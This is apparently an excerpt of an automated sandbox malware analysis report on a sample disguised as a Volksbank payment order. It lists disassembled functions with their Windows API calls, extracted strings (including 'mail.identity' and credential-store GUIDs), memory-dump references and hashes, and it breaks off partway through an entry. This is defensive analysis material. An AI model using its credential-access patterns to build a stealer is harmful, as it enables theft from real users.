                                                                                                                                                                                                                                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                                                                          Function 0042FF31 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: $, $CREATE TABLE
                                                                                                                                                                                                                                          • API String ID: 3510742995-3459038510
                                                                                                                                                                                                                                          • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                                                          • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                                                                          Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                                                                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                                                                            • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                                                                            • Part of subcall function 004108E5: CoTaskMemFree.COMBASE(00000000), ref: 00410970
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3503910906-0
                                                                                                                                                                                                                                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                                                                          Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                                                                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                                                                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3798638045-0
                                                                                                                                                                                                                                          • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                          • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                                                                          Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                                                                                                                                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                                                                          • atoi.MSVCRT(?,00000000,?,76940A60,?,00000000), ref: 0040B619
                                                                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                                                                          • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4107816708-0
                                                                                                                                                                                                                                          • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                                                                          Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: strlen
                                                                                                                                                                                                                                          • String ID: >$>$>
                                                                                                                                                                                                                                          • API String ID: 39653677-3911187716
                                                                                                                                                                                                                                          • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                          • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                                                                          Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                          • API String ID: 3510742995-2766056989
                                                                                                                                                                                                                                          • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                          • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                                                                          Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strcmpi
                                                                                                                                                                                                                                          • String ID: C@$mail.identity
                                                                                                                                                                                                                                          • API String ID: 1439213657-721921413
                                                                                                                                                                                                                                          • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                          • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                                                                          Function 00410F10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                                                                          • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                                                                          • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1479990042-0
                                                                                                                                                                                                                                          • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                                                          • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                                                                          Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406640
                                                                                                                                                                                                                                            • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                                                                            • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy$memset$memcmp
                                                                                                                                                                                                                                          • String ID: Ul@
                                                                                                                                                                                                                                          • API String ID: 270934217-715280498
                                                                                                                                                                                                                                          • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                          • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                                                                          Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 203655857-0
                                                                                                                                                                                                                                          • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                          • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                                                                          Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                                                                            • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                            • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,76940A60,00000000,?,?,0040A7BE,00000001,0044CBC0,76940A60), ref: 00406D4D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                                                                          • String ID: </%s>
                                                                                                                                                                                                                                          • API String ID: 3699762281-259020660
                                                                                                                                                                                                                                          • Opcode ID: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                                                                                                                                                                                                          • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                                                                                                                          Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _ultoasprintf
                                                                                                                                                                                                                                          • String ID: %s %s %s
                                                                                                                                                                                                                                          • API String ID: 432394123-3850900253
                                                                                                                                                                                                                                          • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                          • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                                                                                                                                          Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040909B
                                                                                                                                                                                                                                            • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                                                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                                                                                                                                            • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                                                                                                                                            • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                                                                                                                                            • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                                                                                                                                            • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                                                                                                                                            • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                                                                                                                                          • String ID: menu_%d
                                                                                                                                                                                                                                          • API String ID: 1129539653-2417748251
                                                                                                                                                                                                                                          • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                          • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                                                                                                                                          Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _msizerealloc
                                                                                                                                                                                                                                          • String ID: failed memory resize %u to %u bytes
